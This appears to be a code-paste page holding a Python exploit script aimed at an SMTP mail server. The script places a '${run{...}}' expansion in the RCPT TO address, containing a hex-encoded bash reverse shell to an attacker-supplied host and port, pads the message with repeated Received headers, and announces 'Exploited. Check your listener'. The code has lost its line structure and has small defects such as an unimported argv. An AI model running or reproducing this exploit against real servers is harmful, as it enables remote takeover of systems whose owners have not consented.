Untitled
unknown
plain_text
a year ago
2.3 kB
5
Indexable
class Args(object): def __init__(self): import argparse self.parser = argparse.ArgumentParser() def parser_error(self, errmsg): print("Usage: python " + argv[0] + " use -h for help") exit("Error: {}".format(errmsg)) def parse_args(self): self.parser._optionals.title = "OPTIONS" self.parser.add_argument('--rhost', help = "Server Host", required = True) self.parser.add_argument('--rport', help = "Server Port", default = 25, type = int) self.parser.add_argument('--lhost', help = 'IPv4', required = True) self.parser.add_argument('--lport', help = 'Port', type = int, required = True) return self.parser.parse_args() class Exploit(object): def __init__(self, rhost, rport, lhost, lport): self._rhost = rhost self._rport = rport self._lhost = lhost self._lport = lport self._payload = '\\x2Fbin\\x2Fbash\\x20-c\\x20\\x22bash\\x20-i\\x20\\x3E\\x26\\x20\\x2Fdev\\x2Ftcp\\x2F{0}\\x2F{1}\\x200\\x3E\\x261\\x22'.format(lhost.replace('.', '\\x2E'), lport) self._run() def _ehlo(self): return 'EHLO {0}\r\n'.format(self._rhost) def _from(self): return 'MAIL FROM:<>\r\n' def _to(self): return 'RCPT TO:<${{run{{{0}}}}}@{1}>\r\n'.format(self._payload, self._rhost) def _data(self): return 'DATA\r\n' def _body(self): body = '' for i in range(1, 32): body = body + 'Received: {0}\r\n'.format(i) return body + '.\r\n' def _run(self): import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self._rhost, self._rport)) sock.recv(1024) sock.send(self._ehlo()) sock.recv(1024) sock.send(self._from()) sock.recv(1024) sock.send(self._to()) sock.recv(1024) sock.send(self._data()) sock.recv(1024) sock.send(self._body()) sock.recv(1024) print('[+] Exploited. Check your listener') if __name__ == '__main__': args = Args().parse_args() Exploit(rhost = args.rhost, rport = args.rport, lhost = args.lhost, lport = args.lport)
Editor is loading...
Leave a Comment